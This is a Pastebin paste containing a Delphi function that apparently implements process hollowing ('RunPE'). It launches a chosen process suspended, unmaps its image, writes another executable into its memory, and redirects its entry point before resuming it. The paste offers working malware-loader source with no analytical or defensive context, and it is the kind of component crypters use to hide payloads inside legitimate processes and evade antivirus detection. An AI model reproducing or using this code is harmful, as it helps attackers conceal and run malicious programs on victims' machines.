Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- (*****************************************
- MyMemoryExecute() Function
- Loads a choosen application into the
- memory of another application, with
- or without choosen parameters. Can
- also load file visible.
- ****************************************)
- Function MyMemoryExecute(Buffer: Pointer; ProcessName, Parameters: String; Visible: Boolean): Boolean;
- Var
- ProcessInfo :TProcessInformation;
- StartupInfo :TStartupInfo;
- Context :TContext;
- BaseAddress :Pointer;
- BytesRead :DWORD;
- BytesWritten :DWORD;
- I :ULONG;
- OldProtect :ULONG;
- NTHeaders :PImageNTHeaders;
- Sections :PImageSectionHeaders;
- Success :Boolean;
- Begin
- Result := False;
- FillChar(ProcessInfo, SizeOf(TProcessInformation), 0);
- FillChar(StartupInfo, SizeOf(TStartupInfo), 0);
- StartupInfo.cb := SizeOf(TStartupInfo);
- StartupInfo.wShowWindow := Word(Visible);
- If (zCreateProcessA(PChar(ProcessName), PChar(Parameters), NIL, NIL,
- False, CREATE_SUSPENDED, NIL, NIL, StartupInfo, ProcessInfo)) Then
- Begin
- Success := True;
- Try
- Context.ContextFlags := CONTEXT_INTEGER;
- If (zGetThreadContext(ProcessInfo.hThread, Context) And
- (zReadProcessMemory(ProcessInfo.hProcess, Pointer(Context.Ebx + 8),
- @BaseAddress, SizeOf(BaseAddress), BytesRead)) And
- (zZwUnmapViewOfSection(ProcessInfo.hProcess, BaseAddress) >= 0) And
- (Assigned(Buffer))) Then
- Begin
- NTHeaders := PImageNTHeaders(Cardinal(Buffer) + Cardinal(PImageDosHeader(Buffer)._lfanew));
- BaseAddress := zVirtualAllocEx(ProcessInfo.hProcess,
- Pointer(NTHeaders.OptionalHeader.ImageBase),
- NTHeaders.OptionalHeader.SizeOfImage,
- MEM_RESERVE or MEM_COMMIT,
- PAGE_READWRITE);
- If (Assigned(BaseAddress)) And
- (zWriteProcessMemory(ProcessInfo.hProcess, BaseAddress, Buffer,
- NTHeaders.OptionalHeader.SizeOfHeaders,
- BytesWritten)) Then
- Begin
- Sections := PImageSectionHeaders(ImageFirstSection(NTHeaders));
- For I := 0 To NTHeaders.FileHeader.NumberOfSections -1 Do
- If (zWriteProcessMemory(ProcessInfo.hProcess,
- Pointer(Cardinal(BaseAddress) +
- Sections[I].VirtualAddress),
- Pointer(Cardinal(Buffer) +
- Sections[I].PointerToRawData),
- Sections[I].SizeOfRawData, BytesWritten)) Then
- zVirtualProtectEx(ProcessInfo.hProcess,
- Pointer(Cardinal(BaseAddress) +
- Sections[I].VirtualAddress),
- Sections[I].Misc.VirtualSize,
- Protect(Sections[I].Characteristics),
- OldProtect);
- If (zWriteProcessMemory(ProcessInfo.hProcess,
- Pointer(Context.Ebx + 8), @BaseAddress,
- SizeOf(BaseAddress), BytesWritten)) Then
- Begin
- Context.Eax := ULONG(BaseAddress) +
- NTHeaders.OptionalHeader.AddressOfEntryPoint;
- Success := zSetThreadContext(ProcessInfo.hThread, Context);
- End;
- End;
- End;
- Finally
- If (Not Success) Then
- zTerminateProcess(ProcessInfo.hProcess, 0)
- Else
- zResumeThread(ProcessInfo.hThread);
- Result := Success;
- End;
- End;
- End;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement